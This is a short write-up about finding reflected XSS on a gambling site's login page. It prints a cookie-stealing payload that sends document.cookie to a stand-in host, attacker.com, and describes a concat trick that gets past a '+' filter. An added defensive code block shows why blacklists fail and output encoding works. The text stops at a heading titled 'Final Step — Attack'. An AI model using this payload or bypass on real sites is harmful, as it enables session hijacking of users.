Today, the gambling industry is one of the hottest topics, so I decided to examine this site for vulnerabilities. About 80% of these sites use a single script. This means that if one of them has a problem, the others will have the same problem, putting several million people at risk!
Step One — Information Gathering
I had to look for vulnerable pages. I checked several sections of the site but found nothing conclusive. Then I accidentally noticed that the login page is displayed to me even when I am already logged in. It might be a programming mistake, but it could become dangerous if there is a vulnerability on that page: if the user has already logged into their account, we might be able to gain access to it.
Step Two — Vulnerability
The filtering of the input parameters was the most challenging aspect of this vulnerability. I identified the forbidden characters by submitting different test strings.
Step Three — Payload
To send cookies to our server, we must use the following payload, but the problem is that some of its characters are filtered, so it does not work:
var url = "http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;
We cannot append the cookie to our URL because the plus sign (+) is filtered.
Bypass: split the address into two parts (the site and the cookie) and combine them using "concat" in a new variable.
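As an added illustration from the defender's side (not code from the original write-up), the following shows why a character blacklist like the one above does not fix reflected XSS, and what contextual output encoding does instead. The function names and sample inputs are constructed for this example; only the payload text comes from the write-up.

```javascript
// Added example, not code from the original write-up. Function names and
// sample inputs are constructed for illustration.

// Blacklist filter: reject the value if it contains any forbidden character.
// Here the only forbidden character is '+', as described in the write-up.
const FORBIDDEN = ["+"];
function blacklistFilter(input) {
  return FORBIDDEN.some((c) => input.includes(c)) ? null : input;
}

// Contextual output encoding: HTML-escape the value before placing it in the
// HTML body, so the browser renders it as text and never parses it as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Detection helper: does the rendered page still contain a live <script> element?
function containsScriptTag(html) {
  return html !== null && /<script\b/i.test(html);
}

// Sample inputs (constructed): the write-up's payload, and the concat variant it describes.
const PAYLOAD_PLUS =
  '<script>var url = "http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;</script>';
const PAYLOAD_CONCAT =
  '<script>var url = "http://attacker.com/evil.php?cookie=".concat(document.cookie); document.location = url;</script>';

// Two ways a server might reflect a request parameter into a greeting.
function reflectWithBlacklist(value) {
  const clean = blacklistFilter(value);
  return clean === null ? null : "<p>Hello " + clean + "</p>";
}
function reflectWithEncoding(value) {
  return "<p>Hello " + escapeHtml(value) + "</p>";
}
```

The blacklist stops only the exact payload it was written against, while encoding neutralises both variants; marking the session cookie HttpOnly additionally keeps it out of document.cookie even if a script does run.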
Final Step — Attack